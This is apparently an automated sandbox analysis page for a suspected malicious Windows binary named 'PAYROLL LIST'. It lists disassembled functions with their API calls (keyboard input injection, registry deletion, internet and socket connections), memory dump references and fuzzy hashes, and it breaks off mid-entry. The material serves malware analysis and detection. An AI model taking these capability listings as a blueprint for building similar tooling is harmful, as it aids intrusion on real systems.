Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00A83BD1,?,00A83E06), ref: 00A83BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A83BFB

Strings

RegDeleteKeyExW, xrefs: 00A83BF5
advapi32.dll, xrefs: 00A83BE4

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 0a5d898c15022b4aeff36f86e5d31e5bf908e19e7b1ac0ecf58307721abc7448
Instruction ID: 252980480e155e97f7a18364784c112d8b8e8b68039fc1e20cd072db3e2c0da6
Opcode Fuzzy Hash: 0a5d898c15022b4aeff36f86e5d31e5bf908e19e7b1ac0ecf58307721abc7448
Instruction Fuzzy Hash: F3D0A7B1800713AFCB20AFE0E808603BAF4BB06714B10481AE487E2690D7B0C4858F10

Function 00A59B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a967251e3bdb6bc0ee8c694a77fe93aa9480448e6fd396b8ef9ad638d85882
Instruction ID: a0dfdee6957c7fd00f30f84995da37c330b21141ed2de32342b631ce83d7d3ac
Opcode Fuzzy Hash: 08a967251e3bdb6bc0ee8c694a77fe93aa9480448e6fd396b8ef9ad638d85882
Instruction Fuzzy Hash: 17C13875A0021AEFDB14CF94C984AAEB7B5FF48701F104598ED06AF291D730AE45DBA0

Function 00A7AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A7AAB4
CoUninitialize.OLE32 ref: 00A7AABF

Part of subcall function 00A60213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A6027B

VariantInit.OLEAUT32(?), ref: 00A7AACA
VariantClear.OLEAUT32(?), ref: 00A7AD9D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: fc39f916f4aa3782b0339de98c122af7792af80e2cf4e48ae1de703abbd25bb1
Instruction ID: 41520c9477bb093a083e00198dfded2e6518e72df3531a2025db112ee7342e47
Opcode Fuzzy Hash: fc39f916f4aa3782b0339de98c122af7792af80e2cf4e48ae1de703abbd25bb1
Instruction Fuzzy Hash: 99A15875204711AFCB11EF58C991B1EB7E4BF98710F148459FA9A9B3A2CB30ED00CB86

Function 00A591CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A591DD
SysAllocString.OLEAUT32(?), ref: 00A59286
VariantCopy.OLEAUT32 ref: 00A592B5
VariantClear.OLEAUT32(?), ref: 00A592DC

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 9c39607e22de6e698301bde24531f261997516a2ed4b191febdb6bac34e8ee89
Instruction ID: 403b8d4f875b314e6f4d69910f264ca6ffd464a037f8bfa8916c077887431725
Opcode Fuzzy Hash: 9c39607e22de6e698301bde24531f261997516a2ed4b191febdb6bac34e8ee89
Instruction Fuzzy Hash: C7519F30600706DBDB209F69D491A6FB3A9BF59321F20882FE946CF2D1DB349888C705

Function 00A4365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A436B7
_memcpy_s.LIBCMT ref: 00A43729
__filbuf.LIBCMT ref: 00A437AA
_memset.LIBCMT ref: 00A437EE

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: 0e7fac4ecce63b82b830ffe526d518da512777afe13c4f3d996db01a10adc74f
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: A851A6BAA00206ABDF24DF69898566FB7B1AFC0320F258729F875962D0D7749F509F40

Function 00A8C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00B887A0,?), ref: 00A8C544
ScreenToClient.USER32(?,00000002), ref: 00A8C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00A8C5DA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 9892b670c80b9baf094580efcbb910ea55d9e891fcc3980421c82c352178e1c2
Instruction ID: 1e070aef846c2ed470e45acd59efb1e30181337fc474bf5f4dc41b91add57c6e
Opcode Fuzzy Hash: 9892b670c80b9baf094580efcbb910ea55d9e891fcc3980421c82c352178e1c2
Instruction Fuzzy Hash: 96512D75900245EFCF14EF68C8809AE7BB5FB55320F108669F9559B291E730ED41CFA0

Function 00A5C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A5C462
__itow.LIBCMT ref: 00A5C49C

Part of subcall function 00A5C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00A5C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00A5C505
__itow.LIBCMT ref: 00A5C55A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: d4cf743df59982f3f16b731addd82867ab6ce75286093f0331adabaa00171bda
Instruction ID: d67d1b5c7c8e7867555de947bf4972604ea9600ace3cbb13c76b70feda1e1067
Opcode Fuzzy Hash: d4cf743df59982f3f16b731addd82867ab6ce75286093f0331adabaa00171bda
Instruction Fuzzy Hash: 9A41E631A00318AFDF11EF68D945FEE7BB5BF49711F000029F906A3281DB709A49CBA1

Function 00A6390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A63966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00A63982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00A639EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00A63A4D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4c289b1d804a592b0c7fedabc257fedbe336e25d38eef94cd126b6c74f38a3c0
Instruction ID: 263ea2f70fd0783c30fa41add3f938f04347bc13b7dc9cda79686847f9023c94
Opcode Fuzzy Hash: 4c289b1d804a592b0c7fedabc257fedbe336e25d38eef94cd126b6c74f38a3c0
Instruction Fuzzy Hash: 07410773E04648AAEF308BA48C15BFDBBB59F55350F04015AE5C2922C1C7B58E86DB65

Function 00A8B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A8B5D1

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: e6e83ed083af9f560e409c64b2c883c882e6726558cf529a0802a890193d087d
Instruction ID: 4e3bc0c3dd78cd5235d363bf0d12bde7e2f1111bbdf174635dffe01cf03c6ae0
Opcode Fuzzy Hash: e6e83ed083af9f560e409c64b2c883c882e6726558cf529a0802a890193d087d
Instruction Fuzzy Hash: 8631C174621214BFEF38EF58CC85FA87B65EB06310F644121FA53D62E1E730A9419B75

Function 00A8D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A8D807
GetWindowRect.USER32(?,?), ref: 00A8D87D
PtInRect.USER32(?,?,00A8ED5A), ref: 00A8D88D
MessageBeep.USER32(00000000), ref: 00A8D8FE

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: d87f0366f589f95e79d6de0eed19cee1b239ed0f659b3074e7a361ecc952f77c
Instruction ID: 076b7d7c279f8fd7a2c636335b7f9e566e87ec0e2c401a9fb1f9b5cfb464e669
Opcode Fuzzy Hash: d87f0366f589f95e79d6de0eed19cee1b239ed0f659b3074e7a361ecc952f77c
Instruction Fuzzy Hash: EB418975A00259DFCB11EF98D884BA9BBF5FF49314F1881A9E815DF2A0D730E946CB40

Function 00A63A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00A63AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00A63AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00A63B34
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00A63B92

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ee7280d687f4c2046386e1f1c1a2363dcb3b664007031c5aa559ab21b3f8de53
Instruction ID: ae329ecc1607523902b715c4e805e75da159465f6352413bb0460baec10bacc2
Opcode Fuzzy Hash: ee7280d687f4c2046386e1f1c1a2363dcb3b664007031c5aa559ab21b3f8de53
Instruction Fuzzy Hash: 2331F472E00258AEFF219BA48819BFE7BBA9B56310F04025AE4C2932D1C7758F47D761

Function 00A54004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A54038
__isleadbyte_l.LIBCMT ref: 00A54066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00A54094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00A540CA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e73d55b8fc8f64a9cd88608e5f36edf85e21f68491efc3dff0c53a0ced34dae2
Instruction ID: e8c05eb91d4a0a63d38d4a39c95b3ff5053cd5057e2a51ef30e98501a5a045c7
Opcode Fuzzy Hash: e73d55b8fc8f64a9cd88608e5f36edf85e21f68491efc3dff0c53a0ced34dae2
Instruction Fuzzy Hash: 4231C130604206AFDB219F75C844BAA7BB5FF49316F254028FA618B0D0E735D8D9DB90

Function 00A87CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A87CB9

Part of subcall function 00A65F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A65F6F
Part of subcall function 00A65F55: GetCurrentThreadId.KERNEL32 ref: 00A65F76
Part of subcall function 00A65F55: AttachThreadInput.USER32(00000000,?,00A6781F), ref: 00A65F7D

GetCaretPos.USER32(?), ref: 00A87CCA
ClientToScreen.USER32(00000000,?), ref: 00A87D03
GetForegroundWindow.USER32 ref: 00A87D09

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: dd2d1bff8d62a99843fdfdcb4f29346388ee34506aabd6363cc42761f5c4f47d
Instruction ID: 5d7a3699acf4ba58bb9661396a8cfa5974713ee88aa938b6e0fc1ff731ef3357
Opcode Fuzzy Hash: dd2d1bff8d62a99843fdfdcb4f29346388ee34506aabd6363cc42761f5c4f47d
Instruction Fuzzy Hash: 95310D71900208AFDB00EFA5D9459EFBBF9EF58314F10846AF815E3211DA319E058BA0

Function 00A8F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

GetCursorPos.USER32(?), ref: 00A8F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A9E4C0,?,?,?,?,?), ref: 00A8F226
GetCursorPos.USER32(?), ref: 00A8F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A9E4C0,?,?,?), ref: 00A8F2A6

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5fbabc8d07dd230d40abc82832d39b8148084b0cf03a3b952964467104f54add
Instruction ID: 15d63eafed77df589e3b2fe9b96fb832a7d9a0d769d5ae3dce5e309bc1704441
Opcode Fuzzy Hash: 5fbabc8d07dd230d40abc82832d39b8148084b0cf03a3b952964467104f54add
Instruction Fuzzy Hash: 19219139600029AFCB15DF94D858EEEBBB5EF0A710F044069F9064B2A1E3349D51DB60

Function 00A7431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A74358

Part of subcall function 00A743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A74401
Part of subcall function 00A743E2: InternetCloseHandle.WININET(00000000), ref: 00A7449E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: edd2fdfefdc15e9b761bd6629eebd626619c115d7a74d5d11d06e7f4182501af
Instruction ID: b8bfbee52275603ca7728435a45712065c0a502da9fd269086f03e588a52bfa9
Opcode Fuzzy Hash: edd2fdfefdc15e9b761bd6629eebd626619c115d7a74d5d11d06e7f4182501af
Instruction Fuzzy Hash: F921A432604A05BFDB159F609C00FBBB7B9FF49710F10C01ABA5D9A590D771D821AB90

Function 00A88A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00A88AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A88AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A88ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A88ADC

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 08f4f079080cda1cd07d14db597544d0fc002e96d0481b5c4952814db1b20c6e
Instruction ID: ad407d2eba6149179e91fedaf9df557e2d29fac5dc7f1fb26cdbcc42146dae16
Opcode Fuzzy Hash: 08f4f079080cda1cd07d14db597544d0fc002e96d0481b5c4952814db1b20c6e
Instruction Fuzzy Hash: B311D031205121AFDB18AB18DD05FBAB7A9AF8A360F158119F816D72E2CF78AC018790

Function 00A78A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00A78AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00A78AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00A78AFF
WSAGetLastError.WSOCK32(00000000), ref: 00A78B16

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 40323e31c5fc0c61ea044c2710e8195cac610ee7ea2741b6495e9d434a7aa6bf
Instruction ID: 836e5fc2321d3205316119e03a4d6a53292c36c32ece497f2189fe85963fa69e
Opcode Fuzzy Hash: 40323e31c5fc0c61ea044c2710e8195cac610ee7ea2741b6495e9d434a7aa6bf
Instruction Fuzzy Hash: EE216372A001249FC715DF69DD85A9EBBFCEF4A350F00816AF84AD7291DB749A418F90

Function 00A60AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A61E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A60ABB,?,?,?,00A6187A,00000000,000000EF,00000119,?,?), ref: 00A61E77
Part of subcall function 00A61E68: lstrcpyW.KERNEL32(00000000,?,?,00A60ABB,?,?,?,00A6187A,00000000,000000EF,00000119,?,?,00000000), ref: 00A61E9D
Part of subcall function 00A61E68: lstrcmpiW.KERNEL32(00000000,?,00A60ABB,?,?,?,00A6187A,00000000,000000EF,00000119,?,?), ref: 00A61ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A6187A,00000000,000000EF,00000119,?,?,00000000), ref: 00A60AD4
lstrcpyW.KERNEL32(00000000,?,?,00A6187A,00000000,000000EF,00000119,?,?,00000000), ref: 00A60AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,00A6187A,00000000,000000EF,00000119,?,?,00000000), ref: 00A60B2E

Strings

cdecl, xrefs: 00A60B25

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
